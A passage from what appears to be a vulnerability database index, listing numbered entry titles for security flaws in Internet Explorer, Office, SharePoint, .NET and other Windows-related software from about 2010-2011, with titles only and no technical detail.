Method Page Handling Remote Information Disclosure [77537] Microsoft IE Cache Objects IFRAME Handling Browsing History Disclosure [77228] Microsoft Outlook Client Large Header Handling Message Body Content Injection [76953] Mozilla Multiple Products Windows D2D Hardware Acceleration Same Origin Policy Bypass Remote Information Disclosure [76460] Microsoft Office Publisher pubconv.dll PUB File Handling Overflow [76406] MPlayer on Windows wrapped Allocation Function calloc() Multiple File Handling Remote Overflow [76237] Microsoft Forefront Unified Access Gateway IIS NULL Session Cookie Parsing Remote DoS [76236] Microsoft Forefront Unified Access Gateway MicrosoftClient.jar JAR File Code Execution [76235] Microsoft Forefront Unified Access Gateway ExcelTables Response Splitting Unspecified XSS [76234] Microsoft Forefront Unified Access Gateway Unspecified XSS [76233] Microsoft Forefront Unified Access Gateway ExcelTables Unspecified XSS [76224] Microsoft Host Integration Server Multiple Process Request Parsing Remote Memory Corruption DoS [76223] Microsoft Host Integration Server Multiple Process Request Parsing Infinite Loop Remote DoS [76214] Microsoft .NET Framework / Silverlight Class Inheritance Restriction Web Page Handling Remote Code Execution [76213] Microsoft IE Virtual Function Table Corruption mshtml.dll Extra Size Index Handling Remote Code Execution [76212] Microsoft IE Use-after-free swapNode() Method Body Element Handling Remote Code Execution [76211] Microsoft IE Select Element Handling Uninitialized Object Access Remote Memory Corruption [76210] Microsoft IE Jscript9.dll Uninitialized Object Access Remote Memory Corruption [76209] Microsoft IE Use-after-free OnLoad Event Handling Remote Code Execution [76208] Microsoft IE Use-after-free Type-Safety Weakness Option Element Handling Remote Code Execution [76207] Microsoft IE OLEAuto32.dll Uninitialized Object Access Remote Memory Corruption [76206] Microsoft IE Use-after-free Scroll Event Handling Remote Code Execution [76049] ServersCheck Monitoring windowsaccountsedit.html Multiple Parameter XSS [75537] Google Chrome Windows Media Player Plugin Infobar Bypass [75511] Microsoft HTML Help itss.dll CHM File Handling Overflow [75471] Windows Media Player AVI File Handling Overflow DoS [75394] Microsoft SharePoint Source Parameter Arbitrary Site Redirect [75393] Microsoft SharePoint Unspecified URI XSS [75391] Microsoft SharePoint Contact Details XSS [75390] Microsoft SharePoint EditForm.aspx XSS [75389] Microsoft SharePoint SharePoint Calendar URI XSS [75387] Microsoft Office Excel Unspecified Signedness Error Excel File Handling Memory Corruption [75386] Microsoft Office Excel Unspecified Conditional Expression Parsing Excel File Handling Memory Corruption [75385] Microsoft Office Excel Unspecified Excel File Record Handling Memory Corruption [75384] Microsoft Office Excel Unspecified Array-Indexing Weakness Excel File Handling Memory Corruption [75383] Microsoft Office Excel Unspecified Use-after-free Memory Dereference Excel File Handling Remote Code Execution [75381] Microsoft SharePoint XML / XSL File Handling Unspecified Arbitrary File Disclosure [75380] Microsoft Office MSO.dll Object Pointer Dereference Word Document Handling Remote Code Execution [75379] Microsoft Office MSO.dll Path Subversion Arbitrary DLL Injection Code Execution [75345] Apple QuickTime on Windows Movie File mp4v Tag Image Description Memory Corruption [75289] GTK+ modules/engines/ms-windows/xp_theme.c uxtheme.dll Path Subversion Arbitrary DLL Injection Code Execution [75271] Microsoft SilverLight DataGrid Memory Leak Multiple Element Remote DoS [75269] Microsoft Silverlight DependencyProperty Property Handling Remote DoS [75250] Microsoft IE Unspecified Remote Code Execution [75174] W-Agora on Windows search.php3 bn Parameter Traversal Local File Inclusion [75172] W-Agora on Windows login.php3 bn Parameter Traversal Local File Inclusion [75171] W-Agora on Windows for-print.php3 bn Parameter Traversal Local File Inclusion [75030] Microsoft msxml.dll xsltGenerateIdFunction Heap Memory Address Disclosure Weakness [74976] Joomla! Administrative Modal Windows XSS [74827] Pidgin on Windows gtkutils.c file: URL Arbitrary Program Execution [74689] PHP on Windows SPL Extension SplFileInfo::getType Function Symlink Arbitrary File Overwrite [74525] Bugzilla on Windows Uploaded Attachment Temporary File Local Information Disclosure [74500] Microsoft IE STYLE Object Parsing Memory Corruption [74499] Microsoft IE SetViewSlave() Function XSLT Object Markup Reloading Memory Corruption [74498] Microsoft IE Shift JIS Character Sequence Parsing Cross-domain Remote Information Disclosure [74497] Microsoft IE Event Handler Cross-domain Remote Information Disclosure [74496] Microsoft IE Protected Mode Bypass Arbitrary File Creation [74495] Microsoft IE window.open() Function Race Condition Memory Corruption [74494] Microsoft IE Crafted Link Telnet URI Handler Remote Program Execution [74450] Microsoft IE HTTPS Session HTTP Set-Cookie Header HSTS includeSubDomains Weakness MiTM Arbitrary Cookie Overwrite [74404] Microsoft .NET Framework System.Net.Sockets Code Access Security Bypass Information Disclosure [74403] Microsoft .NET Framework Chart Control Special URI Character GET Request Parsing Remote Information Disclosure [74398] Microsoft Visio Move Around the Block Visio File Handling Remote Code Execution [74397] Microsoft Visio pStream Release Visio File Handling Remote Code Execution [74396] Microsoft Report Viewer Control Unspecified XSS [74207] IBM Tivoli Directory Server (TDS) on Windows cn=changelog Search Remote DoS [74192] Citrix Access Gateway Plugin for Windows NSEPA.NsepaCtrl.1 ActiveX (nsepa.ocx) Certificate Subject DLL Validation MiTM Remote Code Execution [74191] Citrix Access Gateway Plugin for Windows NSEPA.NsepaCtrl.1 ActiveX (nsepa.ocx) Crafted HTTP Header Remote Overflow [74052] Microsoft IE EUC-JP Encoding Unspecified XSS [73977] ArcSight Connector Appliance Windows Event Log SmartConnector Exported Report Files Permissions Weakness Local Log Data Modification [73897] Oracle VM VirtualBox Guest Additions for Windows XPDM Display Driver Local Overflow [73835] Opera Pop-up Windows Text Node Selection DoS [73773] WebKit Windows Functionality Same Origin Policy Bypass Arbitrary File Disclosure [73670] Microsoft IE XSLT Heap Memory Address Information Disclosure [73660] Microsoft Visio Path Subversion Arbitrary DLL Injection Code Execution [73647] Google Chrome on Windows Unspecified Remote Code Execution [73380] Microsoft Lync Web Components Server Reach/Client/WebPages/ReachJoin.aspx reachLocale Parameter XSS [73372] Apple Mac OS X QuickLook Microsoft Office File Handling Memory Corruption [73230] IBM Datacap Taskmaster Capture Cross-domain Username Windows Authentication Remote Bypass [73100] Microsoft Word Insufficient Pointer Validation Memory Corruption [72960] Microsoft SMB Client Response Handling Remote Code Execution [72954] Microsoft IE Vector Markup Language (VML) Object Handling Memory Corruption [72953] Microsoft IE MIME Sniffing Information Disclosure [72952] Microsoft IE CDL Protocol 302 HTTP Redirect Memory Corruption [72951] Microsoft IE selection.empty JavaScript Statement onclick Event Memory Corruption [72950] Microsoft IE layout-grid-char Style Property Handling Memory Corruption [72949] Microsoft IE Drag and Drop Information Disclosure [72948] Microsoft IE Multiple JavaScript Modifications DOM Manipulation Memory Corruption [72947] Microsoft IE Time Element Memory Corruption [72946] Microsoft IE Drag and Drop Memory Corruption [72944] Microsoft IE SafeHTML Function XSS [72943] Microsoft IE vgx.dll imagedata VML Object DOM Modification Memory Corruption [72942] Microsoft IE Link Properties Handling Memory Corruption [72934] Microsoft XML Editor External Entities Resolution Unspecified Information Disclosure [72933] Microsoft Forefront Threat Management Gateway (TMG) Firewall Client Winsock Provider Remote Code Execution [72932] Microsoft .NET Framework JIT Object Validation Arbitrary Code Execution [72931] Microsoft .NET Framework / Silverlight Array Offset Remote Code Execution [72927] Microsoft Office Excel Out of Bounds WriteAV Unspecified Arbitrary Code Execution [72926] Microsoft Office Excel WriteAV Unspecified Arbitrary Code Execution [72925] Microsoft Office Excel File Handling Unspecified Memory Corruption [72924] Microsoft Office Excel File Handling Unspecified Buffer Overflow [72923] Microsoft Office Excel Unspecified Memory Heap Overwrite Arbitrary Code Execution [72922] Microsoft Office Excel Out of Bounds Array Access Unspecified Arbitrary Code Execution [72921] Microsoft Office Excel Improper Record Parsing Unspecified Arbitrary Code Execution [72920] Microsoft Office Excel Insufficient Record Validation Unspecified Arbitrary Code Execution [72916] Autonomy KeyView Windows Write File Processing Overflow [72724] Microsoft IE Cookie Jacking Account Authentication Bypass [72696] Microsoft Reader AOLL Chunk Array Overflow [72695] Microsoft Reader ITLS Header Piece Handling Overflow [72688] Microsoft IE CEnroll tar.setPendingRequestInfo Remote DoS [72687] Microsoft Reader aud_file.dll Audible Audio File Handling Null Byte Memory Corruption [72686] Microsoft Reader msreader.exe Integer Underflow LIT File Handling Overflow [72685] Microsoft Reader msreader.exe LIT File Handling Overflow [72680] Microsoft IE UTF-7 Local Redirection XSS [72679] Microsoft IE Tags javascript:[jscodz] XSS [72677] Microsoft IE Mime-Sniffing Content-Type Handling Weakness [72674] Microsoft IE img Tag Cross-domain Cookie Disclosure [72671] Microsoft Excel Spreadsheet Printing Memory Cleartext PIN Disclosure [72236] Microsoft Office PowerPoint Presentation Parsing Unspecified Overflow [72235] Microsoft Office PowerPoint File Handling Unspecified Memory Corruption [72091] Mozilla Firefox for Windows WebGLES Library Missing ASLR Protection Weakness [71929] HP Virtual Server Environment for Windows Unspecified Remote Privilege Escalation [71856] Microsoft IIS Status Header Handling Remote Overflow [71847] Wireshark on Windows epan/dissectors/packet-nfs.c NFS Dissector DoS [71782] Microsoft .NET Framework x86 JIT Compiler XAML Browser Application (XBAP) Processing Stack Corruption [71777] Microsoft IE Frame Tag Handling Information Disclosure [71771] Microsoft Office PowerPoint TimeColorBehaviorContainer (Techno-color Time Bandit) Floating Point Processing Remote Code Execution [71770] Microsoft Office PowerPoint PersistDirectoryEntry Processing Remote Code Execution [71769] Microsoft Office PowerPoint OfficeArt Atom Parsing Remote Code Execution [71767] Microsoft Office Path Subversion Arbitrary DLL Injection Code Execution [71766] Microsoft Office Excel RealTimeData Record Parsing WriteAV Remote Code Execution [71765] Microsoft Office Excel File Validation Record Handling Overflow [71761] Microsoft Office Excel File Handling Memory Corruption [71760] Microsoft Office Excel File Handling Unspecified Memory Corruption [71759] Microsoft Office Excel External Record Parsing Signedness Overflow [71758] Microsoft Office Excel Substream Parsing Integer Underflow [71726] Microsoft IE JavaScript Unspecified Cross-domain Information Disclosure [71725] Microsoft IE Object Management onPropertyManagement Processing Memory Corruption [71724] Microsoft IE Layouts Handling Memory Corruption [71670] Microsoft IE Pop-up Window Address Bar Spoofing Weakness [71668] Microsoft Visual Studio CPFE.DLL Malformed Source File Handling DoS [71665] Microsoft .NET Framework on XP KB982671 Persistent Firewall Disablement [71596] QTweb for Windows CSS Handling DoS [71595] Apple Safari on Windows CSS Handling DoS [71594] Microsoft IE JavaScript Math.random Implementation Seed Reconstruction Weakness [71400] Adobe Reader / Acrobat on Windows Unspecified Permissions Issue Privilege Escalation (2011-0564) [71354] Nessus Client on Windows Path Subversion Arbitrary DLL Injection Code Execution [71086] Microsoft Visual Studio MFC Applications Path Subversion Arbitrary DLL Injection Code Execution [71017] Microsoft Malware Protection Engine (MMPE) Crafted Registry Key Local Privilege Escalation [70904] Microsoft Office Excel OfficeArt Container Parsing Memory Corruption [70857] Metasploit Framework on Windows Insecure Filesystem Permissions Local Privilege Escalation [70850] Windows Azure SDK Web Role Session Cookies State Information Disclosure [70833] Microsoft IE Insecure Library Loading Remote Code Execution [70832] Microsoft IE mshtml.dll Dangling Pointer Memory Corruption Remote Code Execution [70831] Microsoft IE Uninitialized Memory Corruption Remote Code Execution (2011-0035) [70829] Microsoft Visio Unspecified Data Type Handling Memory Corruption Remote Code Execution [70828] Microsoft Visio LZW Stream Decompression Exception Remote Code Execution [70821] Microsoft OpenType Compact Font Format (CFF) Parsing Remote Code Execution [70813] Microsoft Office PowerPoint OfficeArt Container Parsing Remote Code Execution [70812] Microsoft Office Excel Invalid Object Type Handling Remote Code Execution [70811] Microsoft Office Excel Axis Properties Record Parsing Overflow [70810] Microsoft Office Excel Drawing File Format Shape Data Parsing Use-after-free Arbitrary Code Execution [70726] Opera on Windows Downloads Manager Filesystem Viewing Application Pathname Verification Weakness Arbitrary Code Execution [70622] HP Business Service Management on Windows Unspecified XSS [70557] Oracle Database Server on Windows Cluster Verify Utility Named Pipe Arbitrary Local Command Execution [70509] Oracle Sun Directory Server Enterprise Edition Identity Synchronization for Windows Unspecified Local Issue [70444] Microsoft Data Access Components (MDAC / WDAC) MSADO Record CacheSize Handling Remote Code Execution [70443] Microsoft Data Access Components (MDAC / WDAC) ODBC API (odbc32.dll) SQLConnectW Function DSN / szDSN Argument Handling Overflow [70392] Microsoft IE DOM Implementation cross_fuzz GUI Display Weakness [70391] Microsoft IE MSHTML.DLL ReleaseInterface Function Use-after-free Arbitrary Code Execution [70167] Microsoft IIS FTP Server Telnet IAC Character Handling Overflow [70142] ManageEngine globalSettings.do newWindows Parameter XSS [70012] Opera on Windows Insecure Third Party Module Warning Message Implementation Weakness [69942] Microsoft WMI Administrative Tools WEBSingleView.ocx ActiveX Remote Code Execution [69830] Microsoft IE Cross-Domain Information Disclosure (2010-3348) [69829] Microsoft IE HTML+Time Element outerText Memory Corruption [69828] Microsoft IE Recursive Select Element Remote Code Execution [69827] Microsoft IE Animation HTML Object Memory Corruption (2010-3343) [69826] Microsoft IE Cross-Domain Information Disclosure (2010-3342) [69825] Microsoft IE HTML Object Memory Corruption (2010-3340) [69817] Microsoft SharePoint Office Document Load Balancer Crafted SOAP Request Remote Code Execution [69815] Microsoft Office Publisher Array Indexing Memory Corruption [69814] Microsoft Office Publisher Malformed PUB File Handling Memory Corruption [69813] Microsoft Office Publisher pubconv.dll Array Indexing Memory Corruption [69812] Microsoft Office Publisher pubconv.dll Unspecified Heap Overrun [69811] Microsoft Office Publisher pubconv.dll Size Value Handling Heap Corruption [69810] Microsoft Exchange Server store.exe Malformed MAPI Request Infinite Loop Remote DoS [69809] Microsoft Office FlashPix Image Converter Tile Data Handling Heap Corruption [69808] Microsoft Office FlashPix Image Converter Picture Set Processing Overflow [69807] Microsoft Office Document Imaging Endian Conversion TIFF Image Handling Memory Corruption [69806] Microsoft Office TIFF Image Converter Endian Conversion Buffer Overflow [69805] Microsoft Office TIFF Import/Export Graphic Filter Converter Multiple Overflows [69804] Microsoft Office PICT Image Converter Overflow [69803] Microsoft Office CGM Image Converter Overflow [69796] Microsoft IE CSS Parser mshtml.dll CSharedStyleSheet::Notify Function Use-after-free Remote Code Execution [69771] Mozilla Multiple Products For Windows Line-breaking document.write Call Arbitrary Code Execution [69753] Apple QuickTime on Windows Crafted Track Header Atom Overflow [69752] Apple QuickTime on Windows Apple Computer Directory Permissions Weakness Local Information Disclosure [69606] AWStats on Windows awstats.cgi configdir Parameter Crafted Share Config File Arbitrary Command Execution [69311] Apple Mac OS X QuickLook Crafted Microsoft Office Document Handling Overflow [69095] Microsoft Forefront Unified Access Gateway (UAG) Signurl.asp XSS [69094] Microsoft Forefront Unified Access Gateway (UAG) Mobile Portal Website Unspecified XSS [69093] Microsoft Forefront Unified Access Gateway (UAG) EOP Unspecified XSS [69092] Microsoft Forefront Unified Access Gateway (UAG) Redirection Spoofing Weakness [69091] Microsoft Office PowerPoint File Animation Node Parsing Underflow Heap Corruption [69090] Microsoft Office PowerPoint 95 File Parsing Overflow [69089] Microsoft Office Insecure Library Loading Remote Code Execution [69088] Microsoft Office MSO Large SPID Read AV Remote Code Execution [69087] Microsoft Office Drawing Exception Handling Remote Code Execution [69086] Microsoft Office Art Drawing Record Parsing Remote Code Execution [69085] Microsoft Office 2010 RTF File Handling pFragments Buffer Overflow Arbitrary Code Execution [68987] Microsoft IE mshtml CSS Tag Use-after-free Memory Corruption [68918] Windows Server 2008 Color Control Panel Path Subversion Arbitrary DLL Injection Code Execution [68855] Microsoft IE window.onerror Error Handling URL Destination Information Disclosure [68585] Microsoft Foundation Classes (MFC) Library Window Title Handling Remote Overflow [68584] Microsoft Office Word Uninitialized Pointer Handling Remote Code Execution [68583] Microsoft Office Word Unspecified Boundary Check Remote Code Execution [68582] Microsoft Office Word Array Index Value Handling Unspecified Remote Code Execution [68581] Microsoft Office Word File Unspecified Structure Handling Stack Overflow [68580] Microsoft Office Word Return Value Handling Unspecified Remote Code Execution [68579] Microsoft Office Word Bookmark Handling Invalid Pointer Remote Code Execution [68578] Microsoft Office Word Pointer LFO Parsing Double-free Remote Code Execution [68577] Microsoft Office Word Malformed Record Handling Remote Heap Overflow [68576] Microsoft Office Word BKF Object Parsing Array Indexing Remote Code Execution [68575] Microsoft Office Word File LVL Structure Parsing Remote Code Execution [68574] Microsoft Office Word File Record Parsing Unspecified Memory Corruption [68573] Microsoft Office Excel File Unspecified Record Parsing Remote Integer Overflow [68572] Microsoft Office Excel Formula Record Parsing Memory Corruption (2010-3231) [68571] Microsoft Office Excel File Format Parsing Remote Code Execution [68570] Microsoft Office Excel Lotus 1-2-3 Workbook Parsing Remote Overflow [68569] Microsoft Office Excel Formula Substream Record Parsing Memory Corruption [68568] Microsoft Office Excel Formula Biff Record Parsing Remote Code Execution [68567] Microsoft Office Excel Out Of Bounds Array Handling Remote Code Execution [68566] Microsoft Office Excel Merge Cell Record Pointer Handling Remote Code Execution [68565] Microsoft Office Excel Negative Future Function Parsing Remote Code Execution [68564] Microsoft Office Excel PtgExtraArray Structure Parsing Remote Code Execution [68563] Microsoft Office Excel RealTimeData Record Array Parsing Remote Code Execution [68562] Microsoft Office Excel Out-of-Bounds Memory Write in Parsing Memory Corruption [68561] Microsoft Office Excel Ghost Record Type Parsing Remote Code Execution [68556] Microsoft .NET Framework x64 JIT Compiler Unprivileged Application Remote Code Execution [68548] Microsoft IE / SharePoint Unspecified XSS [68547] Microsoft IE CSS Special Character Processing Unspecified Information Disclosure [68546] Microsoft IE Object Handling Unspecified Memory Corruption (2010-3326) [68545] Microsoft IE Anchor Element Handling Unspecified Information Disclosure [68544] Microsoft IE AutoComplete Functionality Unspecified Information Disclosure [68543] Microsoft IE HtmlDlgHelper Class Object Handling Memory Corruption [68542] Microsoft IE CSS imports() Cross-domain Information Disclosure [68541] Microsoft IE mshtml.dll CAttrArray::PrivateFind Function Object Handling Memory Corruption [68540] Microsoft IE mshtml.dll Object Handling Uninitialized Memory Corruption (2010-3331) [68438] Microsoft XSS Filter Library Bypass [68413] Adobe Reader / Acrobat on Windows Unspecified ActiveX Arbitrary Code Execution [68362] Apple Safari on Windows Webkit.dll Malformed SGV Text Style Handling DoS [68151] Microsoft Office Word MSO.dll Crafted Document Buffer NULL Dereference DoS [68127] Microsoft ASP.NET ViewState Cryptographic Padding Remote Information Disclosure [68123] Microsoft IE / SharePoint toStaticHTML Function Crafted CSS @import Rule XSS Protection Mechanism Bypass [67984] Microsoft Multiple Products Unicode Scripts Processor (Usp10.dll) OpenType Font Processing Memory Corruption [67982] Microsoft Outlook E-mail Content Parsing Remote Overflow [67980] Microsoft IIS Unspecified Remote Directory Authentication Bypass [67979] Microsoft IIS FastCGI Request Header Handling Remote Overflow [67978] Microsoft IIS Repeated Parameter Request Unspecified Remote DoS [67977] Microsoft Visual C++ Redistributable Path Subversion Arbitrary DLL Injection Code Execution [67973] HP Data Protector Express on Windows dpwindtb.dll DtbClsLogin() Function Overflow [67960] Apple Safari on Windows Path Subversion Arbitrary DLL Injection Code Execution [67834] Microsoft IE Cross-Origin CSS Style Sheet Handling Information Disclosure [67795] HP Operations Agent on Windows Unspecified Remote Code Execution [67794] HP Operations Agent on Windows Unspecified Local Privilege Escalation [67733] RealPlayer on Windows RealMedia IVR File Malformed Header Index Array Error Arbitrary Code Execution [67730] RealPlayer on Windows Unspecified Access Restriction Remote Bypass [67704] IBM DB2 Universal Database on Windows User / Group Enumeration DoS [67602] Apple QuickTime on Windows Path Subversion Arbitrary DLL Injection Code Execution [67598] Microsoft Office OneNote Path Subversion Arbitrary DLL Injection Code Execution [67597] Microsoft Office Word Path Subversion Arbitrary DLL Injection Code Execution [67596] Microsoft Office Excel Path Subversion Arbitrary DLL Injection Code Execution [67595] Microsoft Office Access Path Subversion Arbitrary DLL Injection Code Execution [67594] Microsoft Outlook Path Subversion Arbitrary DLL Injection Code Execution [67547] Apple Safari on Windows Path Subversion Arbitrary DLL Injection Code Execution [67546] Microsoft Visio Path Subversion Arbitrary DLL Injection Code Execution [67503] Microsoft Outlook Express Path Subversion Arbitrary DLL Injection Code Execution [67484] Microsoft Office Groove Path Subversion Arbitrary DLL Injection Code Execution [67483] Microsoft Office PowerPoint Path Subversion Arbitrary DLL Injection Code Execution [67463] Microsoft IE location.replace Address Bar Spoofing [67455] Google Chrome Windows Kernel Flaw Mitigation Weakness Unspecified Issue [67365] Microsoft IE removeAttribute() Method Multiple HTML Element Handling NULL Pointer DoS [67329] Apple iTunes for Windows Path Subversion Arbitrary DLL Injection Code Execution [67258] Microsoft ClickOnce MITM Weakness [67132] Microsoft IE Modal Application Prompt Rendering Unspecified DoS [67131] Microsoft IE mshtml.dll Malformed CSS Handling DoS [67121] Windows Mobile on HTC Unspecified Client-side Issue [67119] Microsoft Outlook Web Access (OWA) Multiple Function CSRF [67003] Microsoft IE HTML Layout Table Element Handling Memory Corruption [67002] Microsoft IE Object Handling Unspecified Memory Corruption (2010-2559) [67001] Microsoft IE CIframeElement Object Handling Race Condition Memory Corruption [67000] Microsoft IE boundElements Property Handling Memory Corruption [66999] Microsoft IE OnPropertyChange_Src() Function Malformed HTML/JS Data Handling Memory Corruption [66998] Microsoft IE Event Handler Unspecified Cross-domain Information Disclosure [66997] Microsoft Office Word DOC plcffldMom Parsing Memory Corruption [66996] Microsoft Office Word RTF Document Object Control Word Drawing Overflow [66995] Microsoft Office Word RTF Document Control Word Parsing Memory Corruption [66994] Microsoft Office Word Malformed Record Parsing Unspecified Remote Code Execution [66993] Microsoft .NET Framework / Silverlight CLR Virtual Delegate Handling Remote Code Execution [66992] Microsoft Silverlight Pointer Handling Unspecified Memory Corruption [66991] Microsoft Office Excel PivotTable Cache Data Record Handling Overflow [66973] Microsoft XML Core Services Msxml2.XMLHTTP.3.0 ActiveX HTTP Response Handling Memory Corruption [66752] Google Chrome Windows Kernel Flaw Mitigation Weakness Unspecified Issue [66458] Microsoft DirectX DirectPlay Unspecified NULL Dereference Remote DoS [66457] Microsoft DirectX DirectPlay Unspecified Packet Handling Remote DoS [66381] HP Insight Orchestration for Windows Unspecified Remote Data Modification [66337] Oracle Database Server on Windows Net Foundation Layer Component Unspecified DoS (2010-0903) [66334] Oracle Database Server on Windows Network Layer Component Unspecified Remote Issue (2010-0900) [66296] Microsoft Outlook SMB Attachment Handling Arbitrary Program Execution [66295] Microsoft IE / Office FieldList ActiveX (ACCWIZ.dll) Remote Code Execution [66294] Microsoft Office Access AccWizObjects ActiveX Remote Code Execution [66263] HP Virtual Connect Enterprise Manager for Windows Unspecified XSS [66219] Microsoft Help Files (.CHM) Locked File Functionality Bypass [66160] Microsoft IIS Basic Authentication NTFS Stream Name Permissions Bypass [66040] Ruby on Windows ARGF.inplace_mode Variable Local Overflow [65794] Microsoft IE Cross-domain IFRAME Gadget Focus Change Restriction Weakness Keystroke Disclosure [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65503] Microsoft IE CImWebObj ActiveX Local Overflow DoS [65502] Microsoft IE Unspecified DoS [65487] NovaBACKUP Network / NovaNet on Windows Unspecified Remote Arbitrary Code Execution [65441] Microsoft .NET ASP.NET Form Control __VIEWSTATE Parameter XSS [65343] Microsoft IE ICMFilter Arbitrary UNC File Access [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [65242] CA ARCserve Backup on Windows Unspecified Local Information Disclosure [65239] Microsoft Office Excel String Variable Handling Unspecified Code Execution [65238] Microsoft Office Excel Malformed RTD Handling Memory Corruption [65237] Microsoft Office Excel Malformed RTD Record Handling Memory Corruption [65236] Microsoft Office Excel Malformed OBJ Record Handling Overflow [65235] Microsoft Office Excel Malformed HFPicture Handling Memory Corruption [65234] Microsoft Office Excel on Mac OS X Open XML Permission Weakness [65233] Microsoft Office Excel Unspecified Memory Corruption (2010-0823) [65232] Microsoft Office Excel Malformed ExternName Record Handling Memory Corruption [65231] Microsoft Office Excel Malformed WOPT Record Handling Memory Corruption [65230] Microsoft Office Excel EDG / Publisher Record Handling Memory Corruption [65229] Microsoft Office Excel SxView Record Handling Memory Corruption [65228] Microsoft Office Excel ADO Object DBQueryExt Record Handling Arbitrary Code Execution [65227] Microsoft Office Excel SXVIEW Record Parsing Memory Corruption [65226] Microsoft Office Excel Unspecified Record Handling Stack Corruption Arbitrary Code Execution [65220] Microsoft SharePoint Crafted Request Help Page Invocation Remote DoS [65218] Microsoft IE 8 Developer Tools ActiveX Remote Code Execution [65216] Microsoft IIS Extended Protection for Authentication Memory Corruption [65215] Microsoft IE Uninitialized Object Handling Memory Corruption (2010-1259) [65214] Microsoft IE Uninitialized Object Handling Memory Corruption (2010-1261) [65213] Microsoft IE HTML Element Handling Memory Corruption [65212] Microsoft IE CStyleSheet Object Handling Memory Corruption [65211] Microsoft IE / Sharepoint toStaticHTML Information Disclosure [65150] Microsoft ASP.NET HtmlContainerControl InnerHtml Property Setting Weakness XSS [65110] Microsoft IE Invalid news / nntp URI IFRAME Element Handling Remote DoS [65024] Microsoft Access Backslash Escaped Input SQL Injection Protection Bypass [65013] Microsoft .NET ASP.NET EnableViewStateMac Property Default Configuration XSS [64980] Microsoft Outlook Web Access (OWA) URI id Parameter Information Disclosure [64978] HTC Windows Mobile SMS Preview PopUp SMS Message XSS [64952] Microsoft IE img Tag Hijacking Weakness [64944] Microsoft Dynamics GP Default System Password [64848] Microsoft Dynamics GP System Password Field Substitution Cipher Weakness [64828] Microsoft IE history go ActiveX Overflow DoS [64824] Microsoft IE Address Bar Character Conversion Spoofing Weakness [64794] Microsoft Multiple Products smtpsvc.dll DNS Implementation Predictable Transaction ID MitM DNS Response Spoofing Weakness [64793] Microsoft Multiple Products smtpsvc.dll DNS Implementation ID Transaction Validation MiTM DNS Response Spoofing Weakness [64791] Mozilla Firefox on Windows JavaScript P Element xul.dll gfxWindowsFontGroup::MakeTextRun Function DoS [64790] Mozilla Firefox on Windows JavaScript P Element String Handling DoS [64789] Mozilla Firefox on Windows JavaScript String Concatenation Substring Operation NULL Dereference DoS [64786] Microsoft IE mailto: URL Multiple IFRAME Element Handling DoS [64702] Apple Safari on Windows HTTP Authorization: Basic Header Logging Cross-domain Information Disclosure [64666] Microsoft IE Invisible Hand Extension HTTP Request Logging Cookie Product Search Disclosure [64615] HP Insight Control Server Migration for Windows Unspecified XSS [64539] Microsoft Office OCX ActiveX Controls OpenWebFile() Arbitrary Program Execution [64533] Microsoft IE document.createElement NULL Dereference DoS [64531] Microsoft Outlook Web Access (OWA) Path Traversal Attachment Handling Weakness [64529] Microsoft Visual Basic for Applications VBE6.dll Single-Byte Stack Overwrite [64446] Microsoft Office Visio VISIODWG.DLL Crafted DXF File Handling Overflow [64387] Apple Safari on Windows data.length Handling Local DoS [64384] OpenOffice.org (OOo) on Windows slk File Parsing NULL Pointer DoS [64170] Microsoft SharePoint Server _layouts/help.aspx cid0 Parameter XSS [64083] Microsoft IE XSS Filter Script Tag Filtering Weakness [63931] HP Operations Manager on Windows SourceView ActiveX (srcvw32.dll / srcvw4.dll) LoadFile() Method Remote Overflow [63766] Adobe Reader on Windows PDF Document Embedded EXE File Arbitrary Code Execution [63748] Microsoft Office Publisher 97 File Conversion TextBox Processing Overflow [63742] Microsoft Office Visio Unspecified Index Calculation Memory Corruption [63741] Microsoft Office Visio Unspecified Attribute Validation Memory Corruption [63653] DWG Windows FTP Server Multiple Command Login Restriction Bypass [63522] Microsoft Virtual PC / Server Hypervisor Virtual Machine Monitor Memory Management Implementation Memory Location Protection Mechanism Restriction Bypass [63473] Microsoft IE XML Document Image Element SRC Attribute Unspecified Issue [63470] Microsoft IE Unspecified Arbitrary Code Execution (PWN2OWN) [63469] Microsoft IE DLL File Base Address Discovery Overflow (PWN2OWN) [63451] Apple QuickTime on Windows Crafted BMP File Arbitrary Code Execution [63450] Apple iTunes on Windows Installation Package Race Condition Local Privilege Escalation [63448] Apple QuickTime on Windows MediaVideo Sample Description Atom (STSD) Parsing Memory Corruption [63447] Apple QuickTime on Windows Crafted PICT Image Overflow [63428] Microsoft Wireless Keyboard MAC Address XOR Key Generation Weakness [63335] Microsoft IE Unspecified Uninitialized Memory Corruption [63334] Microsoft IE Post Encoding Information Disclosure [63333] Microsoft IE Unspecified Race Condition Memory Corruption [63332] Microsoft IE Object Handling Unspecified Memory Corruption (2010-0490) [63331] Microsoft IE HTML Object onreadystatechange Event Handler Memory Corruption [63330] Microsoft IE HTML Rendering Unspecified Memory Corruption [63329] Microsoft IE Tabular Data Control (TDC) ActiveX URL Handling CTDCCtl::SecurityCHeckDataURL Function Memory Corruption [63328] Microsoft IE HTML Element Handling Cross-Domain Information Disclosure [63327] Microsoft IE CTimeAction Object TIME2 Handling Memory Corruption [63324] Microsoft IE createElement Method Crafted JavaScript NULL Dereference DoS [63322] Apple Safari on Windows JavaScriptCore.dll HTML Document Object Substring Occurrence DoS [63296] Windows Media Player Error Message Remote File Enumeration [63262] Mozilla Multiple Products on Windows extensions/auth/nsAuthSSPI.cpp nsAuthSSPI::Unwrap Function DoS [63260] CA ARCserve Backup for Windows JRE Multiple Unspecified Issues [63247] Novell eDirectory for Windows Malformed HTTP Request Handling Remote Overflow [63139] lighttpd on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63138] Mongoose on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63137] Cherokee Web Server on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62938] Apple Safari on Windows URL Scheme Validation Crafted HTML File Handling Arbitrary Code Execution [62936] Apple Safari on Windows ImageIO Crafted TIFF File Arbitrary Code Execution [62935] Apple Safari on Windows ImageIO Crafted TIFF File Process Memory Disclosure [62934] Apple Safari on Windows ImageIO Crafted BMP File Process Memory Disclosure [62933] Apple Safari / iTunes on Windows ColorSync Crafted Image Color Profile Overflow [62823] Microsoft Office Excel XLS File DbOrParamQry Record Parsing Overflow [62822] Microsoft Office Excel XLSX File ZIP Header Processing Memory Corruption [62821] 